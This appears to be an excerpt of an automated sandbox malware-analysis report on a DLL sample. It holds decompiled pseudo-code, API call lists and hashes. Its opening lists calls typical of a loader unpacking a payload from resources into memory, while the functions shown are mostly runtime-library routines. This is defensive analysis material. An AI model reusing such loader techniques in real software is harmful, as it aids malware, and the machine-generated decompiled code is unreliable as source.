                                                                                                            0x10006503
                                                                                                            0x1000651a
                                                                                                            0x10006523
                                                                                                            0x10006546
                                                                                                            0x10006557
                                                                                                            0x1000655c
                                                                                                            0x00000000
                                                                                                            0x10006565
                                                                                                            0x10006133

                                                                                                            APIs
                                                                                                            • FindResourceW.KERNEL32(?,00005F4C,1003CE4C), ref: 10006366
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1000636C
                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 10006378
                                                                                                            • VirtualAllocExNuma.KERNEL32(000000FF,00000000,00000000,00000000,00000000,00000000), ref: 10006427
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 100064CA
                                                                                                            • memcpy.MSVCRT ref: 100064D9
                                                                                                            • malloc.MSVCRT ref: 100064E4
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10006523
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
                                                                                                            • String ID: 8nGA7ohfFpugG(l$!#2u__*t5EaFD77$kernel32.dll$msvcrt.dll$ntdll.dll
                                                                                                            • API String ID: 3024364686-882265788
                                                                                                            • Opcode ID: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                                                            • Instruction ID: 1699d20feb2015e992388abaa39e01a506b89f8495deb80be789641e5ebed42c
                                                                                                            • Opcode Fuzzy Hash: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                                                            • Instruction Fuzzy Hash: ACA159719403256FF704EF748EC6E96769CEB46681B00453FF511E726AEBB0B5008B9D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10037446 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10037446(signed char* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				char _v32;
				char _v40;
				char _v48;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t45;
				void* _t49;
				void* _t50;
				signed int _t71;
				signed char* _t73;
				signed int _t82;
				signed char* _t85;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t92;
				void* _t94;

				_t73 = __ecx;
				_t89 = _t94;
				_push(__ecx);
				_push(__ecx);
				_t85 = __ecx;
				_t1 = _t85 + 0x1c; // 0x1004f010
				_t42 = _t1;
				_v8 = _t42;
				EnterCriticalSection(_t42);
				_t3 = _t85 + 4; // 0x20
				_t43 =  *_t3;
				_t4 = _t85 + 8; // 0x3
				if( *_t4 >= _t43) {
					L6:
					_t82 = 1;
					if(_t43 <= 1) {
						L11:
						_t20 = _t43 + 0x20; // 0x40
						_t71 = _t20;
						_t21 = _t85 + 0x10; // 0x3100e68
						_t44 =  *_t21;
						if(_t44 != 0) {
							_t45 = GlobalHandle(_t44);
							_v12 = _t45;
							GlobalUnlock(_t45);
							_t49 = GlobalReAlloc(_v12, _t71 << 3, 0x2002);
						} else {
							_t49 = GlobalAlloc(2, _t71 << 3); // executed
						}
						if(_t49 != 0) {
							_t50 = GlobalLock(_t49);
							_t26 = _t85 + 4; // 0x20
							_v12 = _t50;
							E10011C50(_t50 +  *_t26 * 8, 0, _t71 -  *_t26 << 3);
							 *(_t85 + 4) = _t71;
							 *(_t85 + 0x10) = _v12;
							goto L19;
						} else {
							_t24 = _t85 + 0x10; // 0x3100e68
							_t87 =  *_t24;
							if(_t87 != 0) {
								GlobalLock(GlobalHandle(_t87));
							}
							LeaveCriticalSection(_v8);
							_push(_t89);
							_t91 = _t94;
							_push(_t73);
							_v32 = 0x1004d418;
							E10011C0F( &_v32, 0x10045dc0);
							asm("int3");
							_push(_t91);
							_t92 = _t94;
							_push(_t73);
							_v40 = 0x1004d4b0;
							E10011C0F( &_v40, 0x10045e04);
							asm("int3");
							_push(_t92);
							_push(_t73);
							_v48 = 0x1004d548;
							E10011C0F( &_v48, 0x10045e48);
							asm("int3");
							return _t73[0x70];
						}
					} else {
						_t17 = _t85 + 0x10; // 0x3100e68
						_t73 =  *_t17 + 8;
						while(( *_t73 & 0x00000001) != 0) {
							_t82 = _t82 + 1;
							_t73 =  &(_t73[8]);
							if(_t82 < _t43) {
								continue;
							}
							break;
						}
						if(_t82 < _t43) {
							goto L19;
						} else {
							goto L11;
						}
					}
				} else {
					_t12 = __esi + 0x10; // 0x3100e68
					__ecx =  *_t12;
					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
						L19:
						_t33 = _t85 + 0xc; // 0x3
						if(_t82 >=  *_t33) {
							_t34 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t85 + 0xc)) = _t34;
						}
						_t36 = _t85 + 0x10; // 0x3100e68
						 *( *_t36 + _t82 * 8) =  *( *_t36 + _t82 * 8) | 0x00000001;
						_t40 = _t82 + 1; // 0x4
						 *((intOrPtr*)(_t85 + 8)) = _t40;
						LeaveCriticalSection(_v8);
						return _t82;
					} else {
						goto L6;
					}
				}
			}

























                                                                                                            0x10037446
                                                                                                            0x10037447
                                                                                                            0x10037449
                                                                                                            0x1003744a
                                                                                                            0x1003744d
                                                                                                            0x1003744f
                                                                                                            0x1003744f
                                                                                                            0x10037454
                                                                                                            0x10037457
                                                                                                            0x1003745d
                                                                                                            0x1003745d
                                                                                                            0x10037460
                                                                                                            0x10037465
                                                                                                            0x10037474
                                                                                                            0x10037476
                                                                                                            0x10037479
                                                                                                            0x10037496
                                                                                                            0x10037496
                                                                                                            0x10037496
                                                                                                            0x10037499
                                                                                                            0x10037499
                                                                                                            0x1003749e
                                                                                                            0x100374b1
                                                                                                            0x100374b8
                                                                                                            0x100374bb
                                                                                                            0x100374cf
                                                                                                            0x100374a0
                                                                                                            0x100374a8
                                                                                                            0x100374a8
                                                                                                            0x100374d7
                                                                                                            0x100374fd
                                                                                                            0x10037503
                                                                                                            0x1003750e
                                                                                                            0x10037517
                                                                                                            0x10037522
                                                                                                            0x10037525
                                                                                                            0x00000000
                                                                                                            0x100374d9
                                                                                                            0x100374d9
                                                                                                            0x100374d9
                                                                                                            0x100374de
                                                                                                            0x100374e8
                                                                                                            0x100374e8
                                                                                                            0x100374f1
                                                                                                            0x1001ce3b
                                                                                                            0x1001ce3c
                                                                                                            0x1001ce3e
                                                                                                            0x1001ce48
                                                                                                            0x1001ce4f
                                                                                                            0x1001ce54
                                                                                                            0x1001ce55
                                                                                                            0x1001ce56
                                                                                                            0x1001ce58
                                                                                                            0x1001ce62
                                                                                                            0x1001ce69
                                                                                                            0x1001ce6e
                                                                                                            0x1001ce6f
                                                                                                            0x1001ce72
                                                                                                            0x1001ce7c
                                                                                                            0x1001ce83
                                                                                                            0x1001ce88
                                                                                                            0x1001ce8c
                                                                                                            0x1001ce8c
                                                                                                            0x1003747b
                                                                                                            0x1003747b
                                                                                                            0x1003747e
                                                                                                            0x10037481
                                                                                                            0x10037486
                                                                                                            0x10037487
                                                                                                            0x1003748c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003748c
                                                                                                            0x10037490
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10037490
                                                                                                            0x10037467
                                                                                                            0x10037467
                                                                                                            0x10037467
                                                                                                            0x1003746e
                                                                                                            0x10037528
                                                                                                            0x10037528
                                                                                                            0x1003752b
                                                                                                            0x1003752d
                                                                                                            0x10037530
                                                                                                            0x10037530
                                                                                                            0x10037533
                                                                                                            0x1003753c
                                                                                                            0x1003753f
                                                                                                            0x10037542
                                                                                                            0x10037545
                                                                                                            0x10037551
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003746e

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F010,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 10037457
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000040,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374A8
                                                                                                            • GlobalHandle.KERNEL32(03100E68), ref: 100374B1
                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374BB
                                                                                                            • GlobalReAlloc.KERNEL32 ref: 100374CF
                                                                                                            • GlobalHandle.KERNEL32(03100E68), ref: 100374E1
                                                                                                            • GlobalLock.KERNEL32 ref: 100374E8
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374F1
                                                                                                            • GlobalLock.KERNEL32 ref: 100374FD
                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10037545
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667261700-0
                                                                                                            • Opcode ID: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                                                            • Instruction ID: feedd15bf3e86fe32dc878be1727d2ab34921a7f2ef65c1774b7ebc5d14265f1
                                                                                                            • Opcode Fuzzy Hash: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                                                            • Instruction Fuzzy Hash: 8231AB71A00759AFD722CFB5CC88E5ABBF9FB44241B018929E896DB622D730F900CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001614C Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 91 1001614c-1001615e call 100107b6 94 10016160-10016163 91->94 95 10016168-1001617d 91->95 96 10016345-10016349 94->96 97 1001619d-1001619f 95->97 98 100161a1-100161b5 GetStartupInfoA 97->98 99 1001617f-10016197 97->99 100 100162a4 98->100 101 100161bb-100161c1 98->101 99->97 102 100162a6-100162b5 100->102 101->100 103 100161c7-100161da 101->103 104 100162b7-100162bd 102->104 105 10016326 102->105 106 100161dc 103->106 107 100161de-100161e4 103->107 111 100162c9-100162d0 104->111 112 100162bf-100162c2 104->112 110 1001632a-1001632e 105->110 106->107 108 10016234-10016238 107->108 109 100161e6 107->109 108->100 116 1001623a-10016243 108->116 113 100161eb-100161f4 call 100107b6 109->113 110->102 114 10016334-10016340 SetHandleCount 110->114 115 100162d3-100162df GetStdHandle 111->115 112->115 126 100161f6-10016205 113->126 127 1001622e 113->127 118 10016342-10016344 114->118 119 100162e1-100162ea GetFileType 115->119 120 10016320-10016324 115->120 121 10016245-1001624b 116->121 122 10016299-100162a2 116->122 118->96 119->120 124 100162ec-100162f6 119->124 120->110 121->122 125 1001624d-10016250 121->125 122->100 122->116 128 100162f8-100162fc 124->128 129 100162fe-10016301 124->129 130 10016252-1001625b GetFileType 125->130 131 1001625d-10016294 call 10019599 125->131 135 1001621d-1001621f 126->135 127->108 133 10016307-10016319 call 10019599 128->133 132 10016303 129->132 129->133 130->122 130->131 141 100162c4-100162c7 131->141 142 10016296 131->142 132->133 133->141 144 1001631b-1001631e 133->144 138 10016221-1001622a 135->138 139 10016207-1001621b 135->139 138->113 143 1001622c 138->143 139->135 141->118 142->122 143->108 144->110
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1001614C() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E100107B6(0x480);
				if(_t51 != 0) {
					 *0x1004f920 = _t51;
					 *0x1004f90c = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x1004f920; // 0x0
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x1004f920; // 0x0
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99); // executed
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_push(0xfa0);
								_push( &(_t103[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x1004f90c);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x1004f90c - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x1004f920[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_push(0xfa0);
								_push( &(_t105[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x1004f924;
						while(1) {
							_t78 = E100107B6(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x1004f90c =  *0x1004f90c + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x1004f90c - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
						_t101 =  *0x1004f90c; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}



























                                                                                                            0x10016156
                                                                                                            0x1001615e
                                                                                                            0x10016168
                                                                                                            0x1001616d
                                                                                                            0x10016177
                                                                                                            0x10016177
                                                                                                            0x1001619d
                                                                                                            0x1001619d
                                                                                                            0x1001619f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001617f
                                                                                                            0x10016182
                                                                                                            0x10016186
                                                                                                            0x1001618a
                                                                                                            0x1001618e
                                                                                                            0x10016194
                                                                                                            0x10016197
                                                                                                            0x10016197
                                                                                                            0x10016197
                                                                                                            0x100161a9
                                                                                                            0x100161af
                                                                                                            0x100161b5
                                                                                                            0x100162a4
                                                                                                            0x100162a4
                                                                                                            0x100162a4
                                                                                                            0x100162a6
                                                                                                            0x100162a6
                                                                                                            0x100162af
                                                                                                            0x100162b2
                                                                                                            0x100162b5
                                                                                                            0x10016326
                                                                                                            0x10016326
                                                                                                            0x10016326
                                                                                                            0x00000000
                                                                                                            0x10016326
                                                                                                            0x100162b7
                                                                                                            0x100162b9
                                                                                                            0x100162bd
                                                                                                            0x100162ce
                                                                                                            0x100162d0
                                                                                                            0x100162d0
                                                                                                            0x100162bf
                                                                                                            0x100162c1
                                                                                                            0x100162c1
                                                                                                            0x100162da
                                                                                                            0x100162dc
                                                                                                            0x100162df
                                                                                                            0x10016320
                                                                                                            0x10016320
                                                                                                            0x100162e1
                                                                                                            0x100162e2
                                                                                                            0x100162e8
                                                                                                            0x100162ea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100162ec
                                                                                                            0x100162f1
                                                                                                            0x100162f4
                                                                                                            0x100162f6
                                                                                                            0x100162fe
                                                                                                            0x10016301
                                                                                                            0x10016303
                                                                                                            0x10016303
                                                                                                            0x10016303
                                                                                                            0x10016303
                                                                                                            0x100162f8
                                                                                                            0x100162f8
                                                                                                            0x100162f8
                                                                                                            0x1001630a
                                                                                                            0x1001630f
                                                                                                            0x10016310
                                                                                                            0x10016315
                                                                                                            0x10016319
                                                                                                            0x100162c4
                                                                                                            0x100162c4
                                                                                                            0x10016342
                                                                                                            0x00000000
                                                                                                            0x1001631b
                                                                                                            0x1001631b
                                                                                                            0x00000000
                                                                                                            0x1001631b
                                                                                                            0x10016319
                                                                                                            0x1001632a
                                                                                                            0x1001632a
                                                                                                            0x1001632b
                                                                                                            0x1001632b
                                                                                                            0x1001633a
                                                                                                            0x10016340
                                                                                                            0x10016340
                                                                                                            0x00000000
                                                                                                            0x10016340
                                                                                                            0x100161bb
                                                                                                            0x100161bf
                                                                                                            0x100161c1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100161c7
                                                                                                            0x100161c9
                                                                                                            0x100161cf
                                                                                                            0x100161d8
                                                                                                            0x100161da
                                                                                                            0x100161dc
                                                                                                            0x100161dc
                                                                                                            0x100161de
                                                                                                            0x100161e4
                                                                                                            0x10016234
                                                                                                            0x10016234
                                                                                                            0x10016236
                                                                                                            0x10016238
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001623a
                                                                                                            0x1001623a
                                                                                                            0x1001623e
                                                                                                            0x10016240
                                                                                                            0x10016243
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016245
                                                                                                            0x10016248
                                                                                                            0x1001624b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001624d
                                                                                                            0x10016250
                                                                                                            0x1001625d
                                                                                                            0x10016271
                                                                                                            0x1001627a
                                                                                                            0x1001627f
                                                                                                            0x10016285
                                                                                                            0x1001628a
                                                                                                            0x1001628b
                                                                                                            0x10016290
                                                                                                            0x10016294
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016296
                                                                                                            0x10016296
                                                                                                            0x10016296
                                                                                                            0x00000000
                                                                                                            0x10016296
                                                                                                            0x10016259
                                                                                                            0x1001625b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016299
                                                                                                            0x10016299
                                                                                                            0x1001629e
                                                                                                            0x1001629f
                                                                                                            0x100162a0
                                                                                                            0x100162a0
                                                                                                            0x00000000
                                                                                                            0x100161e6
                                                                                                            0x100161e6
                                                                                                            0x100161eb
                                                                                                            0x100161ec
                                                                                                            0x100161f1
                                                                                                            0x100161f4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100161f6
                                                                                                            0x100161fd
                                                                                                            0x100161ff
                                                                                                            0x100161ff
                                                                                                            0x1001621d
                                                                                                            0x1001621d
                                                                                                            0x1001621f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016207
                                                                                                            0x1001620a
                                                                                                            0x1001620e
                                                                                                            0x10016212
                                                                                                            0x10016218
                                                                                                            0x1001621b
                                                                                                            0x1001621b
                                                                                                            0x1001621b
                                                                                                            0x10016221
                                                                                                            0x10016224
                                                                                                            0x1001622a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001622c
                                                                                                            0x1001622e
                                                                                                            0x00000000
                                                                                                            0x1001622e
                                                                                                            0x100161e4
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 100161A9
                                                                                                            • GetFileType.KERNEL32(?), ref: 10016253
                                                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 100162D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleInfoStartupType
                                                                                                            • String ID:
                                                                                                            • API String ID: 2461013171-0
                                                                                                            • Opcode ID: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                                                            • Instruction ID: 1ab9cbaac9cb8a736ff2886ec947831f70add154915b3c09dc4dcc7ccc4cd674
                                                                                                            • Opcode Fuzzy Hash: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                                                            • Instruction Fuzzy Hash: 6C51F4716057429FD710CF68CC887267BE0EB4A364F258A6DD5A5CF2E2D734E889CB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10013AD4 Relevance: 7.5, APIs: 5, Instructions: 40memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 145 10013ad4-10013adb 146 10013b46-10013b52 HeapDestroy 145->146 147 10013add-10013aed 145->147 148 10013b34-10013b45 HeapFree 147->148 149 10013aef-10013afd 147->149 148->146 150 10013b00-10013b30 VirtualFree * 2 HeapFree 149->150 150->150 151 10013b32-10013b33 150->151 151->148
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013AD4() {
				int _t2;
				void* _t8;
				void* _t14;
				void** _t15;
				void* _t21;
				void* _t23;

				if( *0x10050a64 == 3) {
					_t8 = 0;
					_t21 =  *0x10050a48 - _t8; // 0x0
					if(_t21 > 0) {
						_t14 =  *0x10050a4c; // 0x0
						_t15 = _t14 + 0xc;
						do {
							VirtualFree( *_t15, 0x100000, 0x4000);
							VirtualFree( *_t15, 0, 0x8000);
							HeapFree( *0x10050a60, 0, _t15[1]);
							_t15 =  &(_t15[5]);
							_t8 = _t8 + 1;
							_t23 = _t8 -  *0x10050a48; // 0x0
						} while (_t23 < 0);
					}
					HeapFree( *0x10050a60, 0,  *0x10050a4c);
				}
				_t2 = HeapDestroy( *0x10050a60); // executed
				return _t2;
			}









                                                                                                            0x10013adb
                                                                                                            0x10013ade
                                                                                                            0x10013ae0
                                                                                                            0x10013aed
                                                                                                            0x10013af0
                                                                                                            0x10013afd
                                                                                                            0x10013b00
                                                                                                            0x10013b0c
                                                                                                            0x10013b17
                                                                                                            0x10013b24
                                                                                                            0x10013b26
                                                                                                            0x10013b29
                                                                                                            0x10013b2a
                                                                                                            0x10013b2a
                                                                                                            0x10013b33
                                                                                                            0x10013b42
                                                                                                            0x10013b45
                                                                                                            0x10013b4c
                                                                                                            0x10013b52

                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B0C
                                                                                                            • VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B17
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B24
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B42
                                                                                                            • HeapDestroy.KERNELBASE(100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B4C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$Heap$Virtual$Destroy
                                                                                                            • String ID:
                                                                                                            • API String ID: 782257640-0
                                                                                                            • Opcode ID: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
